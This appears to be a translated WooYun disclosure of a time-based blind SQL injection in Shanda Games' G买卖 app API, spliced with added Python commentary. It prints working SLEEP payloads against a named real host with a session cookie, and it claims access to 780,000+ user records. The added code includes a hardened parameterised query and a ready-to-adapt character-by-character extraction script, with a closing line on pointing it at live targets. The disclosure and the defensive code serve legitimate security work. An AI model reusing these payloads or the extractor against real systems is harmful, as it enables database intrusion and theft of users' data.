WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, browse online -------- http://drop.zone.ci/
2016-04-01: Details sent to the vendor, awaiting the vendor's handling
2016-04-01: Vendor has confirmed; details disclosed to the vendor only
2016-04-11: Details disclosed to core white hats and experts in the relevant field
2016-04-21: Details disclosed to regular white hats
2016-05-01: Details disclosed to intern white hats
2016-05-16: Details disclosed to the public
App security: SQL injection
Target: Shanda Games' G买卖 iOS app. Testing found SQL injection at the following location: the goods_types value inside the JSON-encoded params parameter in the URL (time-based blind injection; in the request below, the * following 0 marks the injection point):
GET http://gmm.sdo.com/api/accountapi/goods?app_version=2.2.0.33&method=GetMyGoodsList&params=%7B%22goods_types%22%3A%220*%22%2C%22page%22%3A1%2C%22state%22%3A1%7D&src_code=8 HTTP/1.1
Cookie: PHPSESSID=eovdj9v072jf2t4ple19er9tv3; path=/; HttpOnly
X-Requested-With: XMLHttpRequest
Referer: http://gmm.sdo.com/api/accountapi/goods?src_code=8&app_version=2.2.0.33&method=GetMyGoodsList&params=%7B%22state%22:0,%22goods_types%22:%2210,12%22,%22page%22:1%7D
Host: gmm.sdo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Payload (3-second delay):
GET http://gmm.sdo.com/api/accountapi/goods?app_version=2.2.0.33&method=GetMyGoodsList&params=%7B%22goods_types%22%3A%220)+AND+(SELECT+*+FROM+(SELECT(SLEEP(3)))v)+AND+(2054%3D2054%22%2C%22page%22%3A1%2C%22state%22%3A1%7D&src_code=8 HTTP/1.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Host: gmm.sdo.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
X-Requested-With: XMLHttpRequest
Pragma: no-cache
Cache-Control: no-cache,no-store
Referer: http://gmm.sdo.com/api/accountapi/goods?src_code=8&app_version=2.2.0.33&method=GetMyGoodsList&params={"state":0,"goods_types":"10,12","page":1}
Cookie: PHPSESSID=eovdj9v072jf2t4ple19er9tv3; path=/; HttpOnly
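The payload only makes sense once the URL-encoded JSON is unwrapped: after percent-decoding and json_decode, goods_types becomes 0) AND (SELECT * FROM (SELECT(SLEEP(3)))v) AND (2054=2054, and the missing closing parenthesis at the end is supplied by the application's own IN (...) clause. The following Python is an added example, not code from the report or from Shanda Games; it assumes the backend interpolates the comma list into an IN (...) clause (inferred from the payload shape), and the table and column names (goods, uid, goods_type, state) are hypothetical. It decodes the two request URLs (the benign one uses the "10,12" value seen in the report's Referer), shows the SQL the vulnerable construction would produce, and shows the validate-then-bind version that rejects the payload.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed request URLs: a benign one using the goods_types value "10,12"
# from the report's Referer, and the report's SLEEP(3) payload.
BENIGN_URL = (
    "http://gmm.sdo.com/api/accountapi/goods?app_version=2.2.0.33"
    "&method=GetMyGoodsList&params=%7B%22goods_types%22%3A%2210%2C12%22"
    "%2C%22page%22%3A1%2C%22state%22%3A1%7D&src_code=8"
)
PAYLOAD_URL = (
    "http://gmm.sdo.com/api/accountapi/goods?app_version=2.2.0.33"
    "&method=GetMyGoodsList&params=%7B%22goods_types%22%3A%220)+AND+"
    "(SELECT+*+FROM+(SELECT(SLEEP(3)))v)+AND+(2054%3D2054%22%2C%22page"
    "%22%3A1%2C%22state%22%3A1%7D&src_code=8"
)


def extract_goods_types(url: str) -> str:
    """Decode the URL the way a PHP backend would ($_GET then json_decode):
    percent-decoding with '+' as space, then the params value parsed as JSON."""
    query = parse_qs(urlsplit(url).query)
    params = json.loads(query["params"][0])
    return params["goods_types"]


def vulnerable_query(goods_types: str, uid: int = 1) -> str:
    """Assumed vulnerable construction (hypothetical table/column names): the
    comma-separated list is interpolated straight into IN (...), so a value
    that starts with ')' closes the list and the remainder runs as SQL."""
    return (f"SELECT * FROM goods WHERE uid = {uid} "
            f"AND goods_type IN ({goods_types}) AND state = 1")


GOODS_TYPES_RE = re.compile(r"^\d+(,\d+)*$")


def is_valid_goods_types(goods_types: str) -> bool:
    """Whitelist check: only a comma-separated list of integers is accepted."""
    return GOODS_TYPES_RE.match(goods_types) is not None


def safe_query(goods_types: str, uid: int = 1):
    """Hardened version: validate first, then emit one bound placeholder per
    value (MySQLdb/PyMySQL style %s) so the driver supplies the values and
    no user-controlled text ever reaches the SQL string."""
    if not is_valid_goods_types(goods_types):
        raise ValueError("goods_types must be a comma-separated list of integers")
    values = [int(v) for v in goods_types.split(",")]
    placeholders = ",".join(["%s"] * len(values))
    sql = ("SELECT * FROM goods WHERE uid = %s AND goods_type IN ("
           + placeholders + ") AND state = %s")
    return sql, [uid, *values, 1]


if __name__ == "__main__":
    for url in (BENIGN_URL, PAYLOAD_URL):
        gt = extract_goods_types(url)
        print("goods_types :", gt)
        print("vulnerable  :", vulnerable_query(gt))
        if is_valid_goods_types(gt):
            print("hardened    :", safe_query(gt))
        else:
            print("hardened    : rejected")
```

Running it shows why the payload ends with an unclosed (2054=2054: the application's own ")" after the IN list closes it, which is what keeps the final statement syntactically balanced.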
1. Current database user
2. All databases
3. User table, covering 780,000+ users / 470,000+ transaction orders
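A SLEEP() oracle like the one above yields no data directly; values such as the current database user are recovered one yes/no question at a time by measuring the response delay. The following Python is an added example of that generic time-based blind extraction technique, not the reporter's actual commands or any code from the report: the MySQL server is replaced by a constructed in-process stand-in (fake_server) with an assumed user() value, the delay is scaled down from the report's 3 seconds, and the injected condition reuses the same "0) ... AND (2054=2054" framing as the report's payload.

```python
import re
import time

# Constructed stand-in for the MySQL side: SECRET_USER is what user() would
# return; DELAY is the SLEEP() length requested (scaled down from 3 s so the
# demo finishes in a few seconds).
SECRET_USER = "gmm_ro@localhost"
DELAY = 0.04

_INJECTED_IF = re.compile(
    r"IF\(ASCII\(SUBSTRING\(user\(\),(\d+),1\)\)>(\d+),SLEEP\(([\d.]+)\),0\)")


def fake_server(goods_types: str) -> float:
    """Behaves like the vulnerable endpoint: evaluates the injected IF() and
    sleeps only when its condition is true. Returns the response time."""
    start = time.perf_counter()
    m = _INJECTED_IF.search(goods_types)
    if m:
        pos, threshold, secs = int(m.group(1)), int(m.group(2)), float(m.group(3))
        # MySQL semantics: SUBSTRING past the end is '' and ASCII('') is 0
        code = ord(SECRET_USER[pos - 1]) if pos <= len(SECRET_USER) else 0
        if code > threshold:
            time.sleep(secs)
    return time.perf_counter() - start


def ask(send, pos: int, threshold: int) -> bool:
    """One yes/no question over the timing side channel: is the ASCII code of
    character `pos` (1-based) of user() greater than `threshold`?"""
    goods_types = (f"0) AND IF(ASCII(SUBSTRING(user(),{pos},1))>{threshold},"
                   f"SLEEP({DELAY}),0) AND (2054=2054")
    return send(goods_types) >= DELAY / 2


def extract_char_code(send, pos: int) -> int:
    """Binary search over 0..127: exactly 7 requests per character."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(send, pos, mid):   # code > mid
            lo = mid + 1
        else:                     # code <= mid
            hi = mid
    return lo


def extract_user(send, max_len: int = 64) -> str:
    """Read user() character by character until ASCII() reports 0 (the end)."""
    chars = []
    for pos in range(1, max_len + 1):
        code = extract_char_code(send, pos)
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    print(extract_user(fake_server))
```

Each character costs 7 requests and, on average, about half of them sleep, which is why the real delay matters: with the report's 3-second SLEEP, a 16-character user name is roughly three minutes of traffic, and database names and table contents (the report's findings 2 and 3) scale the same way. Replace fake_server with a function that sends the real request and returns the elapsed time to use the same logic against a live target you are authorised to test.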
Comments welcome~
Severity: High
Vulnerability Rank: 20
Confirmed: 2016-04-01 10:17
Thank you for your attention to and support of Shanda Games. There is no April Fools' Day in security 0_0
None